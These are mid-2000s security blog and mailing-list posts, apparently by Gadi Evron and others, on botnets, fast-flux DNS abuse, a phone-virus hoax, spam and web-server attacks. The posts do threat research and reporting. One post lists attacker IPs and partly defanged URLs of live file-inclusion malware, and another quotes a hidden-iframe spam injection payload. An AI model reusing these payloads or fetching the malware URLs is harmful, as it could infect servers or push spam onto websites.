From Fergie on funsec:

Date: Fri, 13 Apr 2007 16:14:52 GMT
From: Fergie
To: funsec@linuxbox.org
Subject: [funsec] Pakistan: Deadly ‘Phone Virus’ Threat Causes Panic

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1

Via ComputerWorld (Reuters).

[snip]

Mobile service providers in Pakistan have been inundated by calls from
subscribers worried by a prank message that they could die of a deadly
virus being transmitted via their phones.

The rumor was so effective that some mosques in the country’s biggest city,
Karachi, made announcements that people were being killed by a mobile virus
and they should be aware of God’s wrath.

In a prank reminiscent of the plot in the hit Hollywood movie “The Ring” in
which people die within a week after watching a video, the prankster warned
users that a deadly virus transmitted through phones had killed 20 people.

[snip]

More:

http://www.computerworld.com/action/article.do?command=viewArticleBasic&art

icleId=9016500

Happy Friday the 13th.

Enjoy.

- – ferg

support intelligence releases daily reports on different fortune 500
companies which are heavily affected by the botnet problem, with many
compromised machines on their networks.

you can find more information on their blog:
http://blog.support-intelligence.com/

they are good people, and they know botnets.

gadi evron,
ge@beyondsecurity.com.

What is special about this email subject:

“An unauthenticated, remote attacker could exploit it to gain root on your Solaris system.”

Well at first glace, nothing it looks legit, but believe it or not, this was used a as subject for a SPAM I received (for meds of course).

What baffles me more is the fact that this line does not appear to be written anywhere on the Internet (2 hits in Google), where did they get this text from?

there is a current on-going internet emergency: a critical 0day vulnerability currently exploited in the wild threatens numerous desktop systems which are being compromised and turned into bots, and the domain names hosting it are a significant part of the reason why this attack has not yet been mitigated.

this incident is currenly being handled by several operational groups.

this past february, i sent an email to the reg-ops (registrar operations) mailing list. the email, which is quoted below, states how dns abuse (not the dns infrastructure) is the biggest unmitigated current vulnerability in day-to-day internet security operations, not to mention abuse.

while we argue about this or that tld, there are operational issues of the highest importance that are not being addressed.

the following is my original email message, elaborating on these above statements. please note this was indeed just an email message, sent among friends.

date: fri, 16 feb 2007 02:32:46 -0600 (cst)
from: gadi evron
to: reg-ops@…
subject: [reg-ops] internet security and domain names

hi all, this is a tiny bit long. please have patience, this is important.

on this list (which we maintain as low-traffic) you guys (the
registrars) have shown a lot of care and have become, on our sister mitigation and research lists (those of you who are subscribed), an integral part of our community we now call “the internet security operations community”.

we face problems today though, that you can not help us solve under the current setting. but only you can help us coming up with new ideas.

day-to-day, we are able to report hundreds and thousands of completely bogus phishing and other bad domains, but both policy-wise and resources-wise, registrars can’t handle this. i don’t blame you.

in emergencies, we can only mitigate threats if one of you or yours are in control.. just a week ago we faced the problem of the dolphins stadium being hacked and malicious code being put on it:

1. we tracked down all the ip addresses involved and mitigated them (by we i mean also people other than me. many were involved).
2. we helped the dolphins stadium it staff take care of the malicious code on their web page – specifically gary warner).
3. we coordinated with law enforcement.
4. we coordinated that no one does a press release which will hurt law enforcement.
5. we did a lot more. including actually convincing a chinese registrar to pull one of the domains in question. a miracle. there was another domain to be mitigated, unsuccessfully.

one thing though – at a second’s notice, this could all be for nothing as the dns records could be updated with new ip addresses. there were hundreds of other sites also infected.

even if we could find the name server admin, some of these domains have as many as 40 nss. that doesn’t make life easy. then, these could change, too.

this is the weakest link online today in internet security, which we in most cases can’t mitigate, and the only mitigation route is the domain name.

every day we see two types of fast-flux attacks:
1. those that keep changing a records by using a very low ttl.
2. those that keep changing ns records, pretty much the same.

now, if we have a domain which can be mitigated to solve such
emergencies and one of you happen to run it, that’s great…
however, if we end up with a domain not under the care of you and yours.. we are simply.. fucked. sorry for the language.

icann has a lot of policy issues as well, and the good guys there can’t help. icann has enough trouble taking care of all those who want money for .com, .net or .xxx.

all that being said, the current situation can not go on. we can no longer ignore it nor are current measures sufficient. it is imperative that we find some solutions, as limited as they may be.

we need to be able to get rid of domain names, at the very least during real emergencies. i am aware how it isn’t always easy to distinguish what is good and what is bad. still, we need to find a way.

members of reg-ops:
what do you think can be conceivably done? how can we make a difference which is really needed on today’s internet?

please participate and let me know what you think, we simply can no longer wait for some magical change to happen.

sunshine.

thousands of malicious domain names and several weeks later, we face the current crisis. the 0day vulnerability is exploited in the wild, and mitigating the ip addresses is not enough. we need to be able to “get rid” of malicious domain names. we need to be able to mitigate attacks on the weakest link – dns, which are not necessarily solved by dns-sec or anycast.

on reg-ops and other operational groups, we came up with some imperfect ideas on what we can make happen on our own in short term which will help us reach better mitigation, as security does not seem to be on the agenda of those running dns:

1. a system by which registrars can acknowledge confirmed bad domains (under strict guidelines) and respond to the reports according to their aup and icann policy, thus “getting rid” of them in a much quicker fashion, is being set up at the isotf.
a black list for registrars, if you will. this is far from perfect and currently slow-going. naturally, this can not be forced on all registrars, nor do the black hat ones, care.

2. a black list for resolvers (hopefully large service providers) is also being created at the isotf, so that the risk of visibility of bad domains, as will be defined, can be minimized. naturally, no provider can be forced to use this list and there are millions of unaffiliated resolvers, etc.

other options that have been raised as technically possible, but considered unlikely and indeed, bad:

3. setting up a black list of domain names for tld servers, for them not to respond on.

4. creating an alternate root which we could trust.

another suggestion which was raised:

5. apply to change the icann policy.

we need a solution. this operational issue needs to be added as a main agenda item today so that tomorrow we will be ready to mitigate it. i blame myself to some degree for not raising this with higher echelons 2 and 3 years ago due to respect to those who have been working on dns for many years, but what’s done is done.

the operational communities do not always know how to voice their needs or the difficulties they face. nor will everyone agree on what the issues are. it is my strong belief (which is obviously my personal opinion), based on facts we see in daily security operations on the internet that this issue is paramount, and i am sending here a call for help to the dns experts of the world: what is our next step to be?

what do we currently intend to do (not my personal opinion):
we are formalizing a letter to icann’s ssac, as they are the top experts on dns infrastructure security issues, coming from operational folks at the isotf dealing with daily usage of the dns for abuse purposes (and specifically fastflux).

further, the isotf is moving forward with items #1 and #2 as mentioned above. #3 will have to remain as a contingency, #4 we have no influence to affect. #5 is currently being explored.

are we missing a possible solution? what does the larger community suggest?

gadi evron,
ge@beyondsecurity.com.

if you remember, e360 filed against spamhaus. now they filed against the nanas usenet newsgroup maintainer.

this is what happens when you open the door.

http://www.taugh.com/e360-complaint.pdf (thanks to john l).

gadi evron,
ge@beyondsecurity.com.

The SEC is doing the right thing by fighting stock spam. The best way to fight the ‘pump and dump’ schemes is through the body that is responsible for controlling stock trading.

However, this is a slippery slope – is it the company’s fault that someone is running a scam on their stock? Quite the contrary – the company’s stock usually takes a dive, and unless the company’s owners are in on the scheme they have the most to lose from this fraud. Some would say the SEC is doing a favor to those companies by suspending trade, but remember how anonymous email is and how easy it is to spam to million of people – if I run a fake pump-and-dump on MSFT or GOOG (in order for it to work I would need a less high-profile stock, but you get the point) should that result in a trading suspension?

jamie riden, ryan mcgeehan, brian engert and michael mueter just released an honeynet paper on web security called: know your enemy: web application threats.

the paper is very good, and deals with all kinds of web threats such as sql injection and xss. of most interest to me were the code injection and remote code-inclusion, as you remember we published a paper of our own this month on these specific issues in the virus bulletin magazine. the honeynet paper deals with many issues other than these, and is most definitely recommended reading.

in our paper we linked to an older paper by jamie riden. these guys know what they are talking about.

gadi evron,
ge@beyondsecurity.com.

there has been a trojan horse making the rounds, sending email informing people that the australian prime minister suffered from a heart attack (which of course isn’t true).

websense released a nice advisory on it:
http://www.websense.com/securitylabs/alerts/alert.php?alertid=741

gadi evron,
ge@beyondsecurity.com.

we touched on this subject in the past, but recently rich kulawiek wrote a very interesting email to nanog to which i replied, and decided to share my answer here as well –

i stopped really counting bots a while back. i insisted, along with many friends, that counting botnets was what matters. when we reached thousands we gave that up.

we often quoted anti-nuclear weapons proliferation sentiments from the cold war, such as: “why be able to destroy the world a thousand times over if once is more than enough?” we often also changed it to say “3 times” as redundancy could be important. :>

today, it is clear the bad guys can get their hands on as many bots as they need, or in a more scary scenario, want. they don’t need that many.

as a prime example, i believe that verisign made it public that only 200 bots were used in the dns amplification attacks against them last year. even if they missed one, two or even three zeroes, it speaks quite a bit as to our fragile infrastructure.
(more…)

are file inclusion vulnerabilitiess equivalent to remote code execution? are servers (both linux and windows) now the lower hanging fruit rather than desktop systems?

in the february edition of the virus bulletin magazine, we (kfir damari, noam rathaus and gadi evron (me) of beyond security) wrote an article on cross platform web server malware and their massive use as botnets, spam bots and generally as attack platforms.

web security papers deal mostly with secure coding and application security. in this paper we describe how these are taken to the next level with live attacks and operational problems service providers deal with daily.

we discuss how these attacks work using (mainly) file inclusion vulnerabilities (rfi) and (mainly) php shells.
further, we discuss how isps and hosting farms suffer tremendously from this, and what can be done to combat the threat.
(more…)

in a non-operational nanog discussion about google bandwidth uses, several statements were made. it all started from the following post by mark boolootian:

> cringley has a theory and it involves google, video, and oversubscribed backbones:
> http://www.pbs.org/cringely/pulpit/2007/pulpit_20070119_001510.html

in the discussion, the following statement was made by rodrick brown:

> the following comment has to be one of the most important comments in
> the entire article and its a bit disturbing.
>
> “right now somewhat more than half of all internet bandwidth is being
> used for bittorrent traffic, which is mainly video. yet if you
> surveyed your neighbors you’d find that few of them are bittorrent
> users. less than 5 percent of all internet users are presently
> consuming more than 50 percent of all bandwidth.”

from there it went down-hill with discussion of the future, with the venice project (streaming p2p for tv), etc. being mentioned. some points were raised about how isps currently fight p2p technologies and may fight these new worlds of functionality, denying what the users want rather than work with them, citing as we have seen above that today, a very small percentage of internet users account for about 50% of all internet traffic. that of course, will increase dramatically in the future — it is where the users want to go.

the isps inhibit this progress, just like in my opinion a bad security “guy” or “gal” would try to prevent functionality from their users as part of their security strategy, rather than work with their users and enable functionality first.

in this discussion, randy bush (who i have had my share of strong disagreements with in the past) said the following, which is admirable:

> the heavy hitters are long known. get over it.
>
> i won’t bother to cite cho et al. and similar actual measurement
> studies, as doing so seems not to cause people to read them, only to say
> they already did or say how unlike japan north america is. the
> phenomonon is part protocol and part social.
>
> the question to me is whether isps and end user borders (universities,
> large enterprises, …) will learn to embrace this as opposed to
> fighting it; i.e. find a business model that embraces delivering what
> the customer wants as opposed to winging and warring against it.
>
> if we do, then the authors of the 2p2 protocols will feel safe in
> improving their customers’ experience by taking advantage of
> localization and proximity, as opposed to focusing on subverting
> perceived fierce opposition by isps and end user border fascists. and
> then, guess what; the traffic will distribute more reasonably and not
> all sum up on the longer glass.

it has been a long time since i bowed before mr. bush’s wisdom, but indeed, i bow now in a very humble fashion.

thing is though, it is equivalent to one or all of the following:
-. eff-like thinking (sticking to the moral high-ground or (at times!) impractical concepts. stuff to live by.
-. (very) forward thinking (not yet possible for people to get behind – by people i mean those who do this daily), likely to encounter much resistence until it becomes mainstream a few years down the road.
-. not connected with what can currently happen to affect change, but rather how things really are which people can not yet accept.

as randy is obviously not much affected when people disagree with him (much the same as me), nor should he be, i am sure he will preach this until it becomes real. with that in mind, if many of us believe this is a philosophical as well as a technological truth — what can be done today to affect this change?

the service providers are not evil — they do this out of operational necessity and business needs. how can this change or shown to be wrong?

some examples may be:
-. working with network gear vendors to create better equipment built to handle this and lighten the load.
-. working on establishing new standards and topologies to enable both vendors and providers to adopt them.
-. presenting case studies after putting our money where our mouth is, and showing how we made it work in a live network.

staying in the philosophical realm is more than respectable, but waiting for fussp-like wide-adoption or for sheep to fly is not going to change the world, much.

for now, the p2p folks who in most cases are not eveel “internet pirates”, are mostly allied whether in name or in practice with illegal activities. the technology isn’t illegal and can be quite good for all of us to save quite a bit of bandwidth rather than waste it (quite a bit of redundancy there!).

so, instead of fighting progress and seeing it [p2p technology] left in the hands of the “pirates” and the privacy folks trying to bypass the firewall of [insert evil regime here], why not utilize it?

how can service providers make use of all this redundancy among their top talkers and remove the privacy advocates and warez freaks from the picture, leaving that front with less technology and legitimacy while helping themselves?

this is a pure example of a problem from the operational front [realm] which can be floated to research and the industry, with smarter solutions than port blocking and qos.

it’s about progress and how change is affected and feared, not about who is evil. it is about who will step up and make a difference, and whether business today is smart enough to lead the road rather than adapt after the avalanche has already fallen.

gadi evron,
ge@beyondsecurity.com.

important note: the name of the web honeynet project has been changed to the web honeynet task force to avoid confusion with the honeynet project.

[ warning: this post includes links to live web server malware propagated this wednesday via file inclusions exploits. these links are not safe! ]

hello.

the newly formed web honeynet project from securiteam and the isotf will in the next few months announce research on real-world web server attacks which infect web servers with:
tools, connect-back shells, bots, downloaders, malware, etc. which are all cross-platform (for web servers) and currently exploited in the wild.

the web honeynet project will, for now, not deal with the regular sql injection and xss attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

these attacks form botnets constructed from web servers (mainly iis and apache on linux and windows servers) and transform hosting farms/colos to attackplatforms.

most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) php web applications, as is well known and established.

php (or scripting) shells, etc. have been known for a while, as well as file inclusion (or rfi) attacks, however, mostly as something secondary and not much (if any – save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves.

the bad guys currently exploit, create botnets and deface in a massive fashion and force isps and colos to combat an impossible situation where any (mainly) php application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.

what is new here is the scale, and the fact we now start engaging the bad guys on this front (which so far, they have been unchallenged on) – meaning aside for research, the web honeynet project will also release actionable data on offensive ip addresses, urls and on the tools themselves to be made availableto operational folks, so that they can mitigate the threat.

it’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. several folks (andquite loudly – me) have been warning about this for a while, now it’s time to take action instead of talk.

note: below you can find sample statistics on some of the web honeynet project information for this last wednesday, on file inclusion attacks seeding malware.
you will likely notice most of these have been taken care of by now.

the first research on the subject (after looking into several hundred such tools) will be made public on the february edition of the virus bulletin magazine, from:
kfir damari, noam rathaus and gadi evron (yours truly).

the securiteam and isotf web honeynet project is supported by beyond security ( http://www.beyondsecurity.com )..

special thanks (so far) to: ryan carter, randy vaughn and the rest of the new members of the project.

for more information on the web honeynet project feel free to contact me.

also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

sample report and statistics (for wednesday the 10th of january, 2007):

ip | hit count | malware (count), … |
195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4),
http://m embers.lycos.co.uk/onuhack/injek.txt? (6),
http://m embers.lycos.co.uk/onuhack/cmd.do? (2),
69.93.147.242 | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (more…)

I suggest you tell your browsers to change how it handles .pdf files so that instead of displaying them in your browser it will download them. Sven Vetsch has written about a flaw found by found by Stefano Di Paola and Giorgio Fedon (who presented this at CCC, link) in which a .pdf file can run arbitrary JavaScript on the site hosting the file. It seems that just host hosting PDFs you are putting your sites users at risk to all the evil doings JavaScript can perform. If you want to find out more about the flaw I suggest you read the afore-linked blog post, or gnucitizen’s take on it (which has a PoC on it). What I am more interested in right now is fixing the issue.

Obviously a plugin upgrade would be nice, but what about between then and now? I’d be happy if we could get a fix out quickly for web masters to apply to their sites but since the part of the url after the hash is never sent the server (which in this case is what holds the malicous code) any server side solution is pretty much impossible.
Oh what a fun start to the new year eh? On a more light hearted note, first person to see a SPAM email using this technique wins a virtual cookie from me.

hey, do i smell history repeating itself? bots on irc used to be useful too, and then used for local flooding. only later did they become the botnets that they are today.

so, from automated playing when you are not around to keep stuff active (rings a bell?) to botnets that throw… privates at people.

http://www.boingboing.net/2006/12/21/second_life_griefers.html

worth a read. i always love when the real world and the virtual meet, whether by marriages or by physical world police taking complaints because “someone stole my weapon on world of worldcraft!!”

we do live in interesting times.

gadi evron,
ge@beyondsecurity.com.

lately, the bad guys have been using iframe in comments, in order to grab
the content of a spam web page and attempt to show it at the site with the
injected comment. kind of interesting, as much as it is simple:

viagra <iframe
height="1" width="1" src="http:// h ome.tiscali.cz:8080/ racktire/"></iframe>

gadi evron,
ge@beyondsecurity.com.

a few months back i released a post on where i think anti-botnets technology is heading. now it’s time for what happened in 2006, and what we can expect from here on.

i am not a believer in such retrospective looks, as often, they are completely biased and based on what we have seen and what we want to see. this is why i will try and limit myself to what we know happens and is likely to get attention, as well as what we have seen tried by bad guys, which is working for them enough to take to the next level.

what changed with botnets in 2006:

1.botnets reached a level where it is unclear today what parts of the internet are not compromised to an extent. count by clean rather than infected.
2. botnets have become the most significant platform from which virtually any type of online attack and crime are launched. botnets equal an online infrastructure for abusive or criminal activity online.
3. in the past year, botnets have become mainstream. from a not existent field even in the professional realm up to a few years ago, where attacks were happening constantly reagrdless, it has turned to the main buzzword and occupation of the security industry today, directly and indirectly.
4. websites have returned to being one the most significant form of infection for building botnets, which hadn’t been the case since the late 90s.
5. botnets have become the moving force behind organized crime online, with a low-risk high-profit calculation.
6. new technologies are finally being introduced, moving the botnet controllers from using just (or mainly) irc to more advanced c&c (command and control) channels such as p2p, or multi-layered, such as dns and irc on the osi model.
7. botnets used to be a game of quantity. today, when quantity is assured, quality is becoming a high concern for botnet controllers, both in type of bot as well as in abilities.

what’s going to happen with botnets in 2007:

botnets won’t change. all will remain the same as it has been for years. awareness however, will increase making the problem appear larger and larger, perhaps approaching its real scale. the bad guys would utilize their infrastructure to get more out of the bots (quality once quantity is here) and be able to do more than just steal cash. maximizing their revenue.

further, more and more attackers unrelated to the botnet controllers will make use of already compromised systems and existing botnets to gain access to networks, to facilitate anything from corporate espionage and intelligence gathering, to shame-less and open show of strength to those who oppose them (think blue security), in the real world as well as the cyber one (which to the mob is one and the same, it’s the income that speaks).

meaning, the existing botnets infrastructure will be utilized both in an open fashion, due to the fact online miscreants (real-world mob) face virtually no risk, as well as quiet and secretive uses for third-party intelligence operations.

gadi evron,
ge@beyondsecurity.com.